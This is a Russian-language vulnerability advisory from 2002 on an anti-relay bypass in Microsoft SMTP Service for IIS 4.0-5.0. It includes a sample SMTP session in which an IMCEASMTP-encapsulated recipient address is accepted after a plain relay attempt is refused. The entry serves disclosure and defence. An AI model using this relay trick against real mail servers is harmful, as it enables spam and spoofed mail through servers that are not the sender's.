Ретрансляция почтовых сообщений в Microsoft SMTP Service в IIS 4.0-5.0
| Дата публикации: | 15.07.2002 |
| Всего просмотров: | 1524 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Обнаруженная уязвимость в Microsoft SMTP Service, включенным с IIS 4.0-5.0, позволяет удаленному пользователю без авторизации посылать любые почтовые сообщения в обход существующих “anti-relay” фильтров. Изначально уязвимость была обнаружена Лауреном Фринкином и воздействовала на Microsoft Exchange 5.5 до SP2 с SP2 IMC заплатой. Пример: 220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue, 28 May 2002 14:54:10 +0100 helo 250 test-mailer Hello [IP address of source host] MAIL FROM: test@test.com 250 2.1.0 test@test.com....Sender OK RCPT TO: test2@test.com 550 5.7.1 Unable to relay for test@test.com RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk 250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk data 354 Start mail input; end with <CRLF>.<CRLF> Subject: You are vulnerable.уязвимость обнаружена в IIS 4.0 - 5.0 |
| Ссылки: | IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability |